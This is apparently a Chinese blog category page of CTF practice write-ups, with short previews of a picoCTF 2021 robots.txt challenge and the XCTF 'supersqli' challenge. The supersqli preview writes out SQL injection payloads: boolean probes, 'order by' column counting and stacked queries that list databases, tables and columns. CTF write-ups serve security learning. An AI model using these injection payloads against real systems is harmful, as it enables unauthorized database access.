![](https://img-blog.csdnimg.cn/20201014180756922.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
ctf刷题
文章平均质量分 57
能饮一杯吴
没有对象的野指针
展开
-
picoctf 2021 Scavenger Hunt
part1part2part3robots协议也叫robots.txt(统一小写)是一种存放于网站根目录下的ASCII编码的文本文件,它通常告诉网络搜索引擎的漫游器(又称网络蜘蛛),此网站中的哪些内容是不应被搜索引擎的漫游器获取的,哪些是可以被漫游器获取的。因为一些系统中的URL是大小写敏感的,所以robots.txt的文件名应统一为小写。robots.txt应放置于网站的根目录下。如果想单独定义搜索引擎的漫游器访问子目录时的行为,那么可以将自定的设置合并到根目录下的robots.tx.原创 2022-05-05 21:00:12 · 204 阅读 · 0 评论 -
[攻防世界]supersqli
输个单引号看看,可以判断出来是字符型注入。1' and 1=1# #有回显1' and 1=2# #无回显判断列数1' order by 1#1' order by 2#... 2列。用联合注入发现过滤了好多关键字接下来用堆叠注入。1'; show databases;#1'; show tables;#';show columns from `1919810931114514`;#';show colu...原创 2022-04-30 10:04:09 · 230 阅读 · 0 评论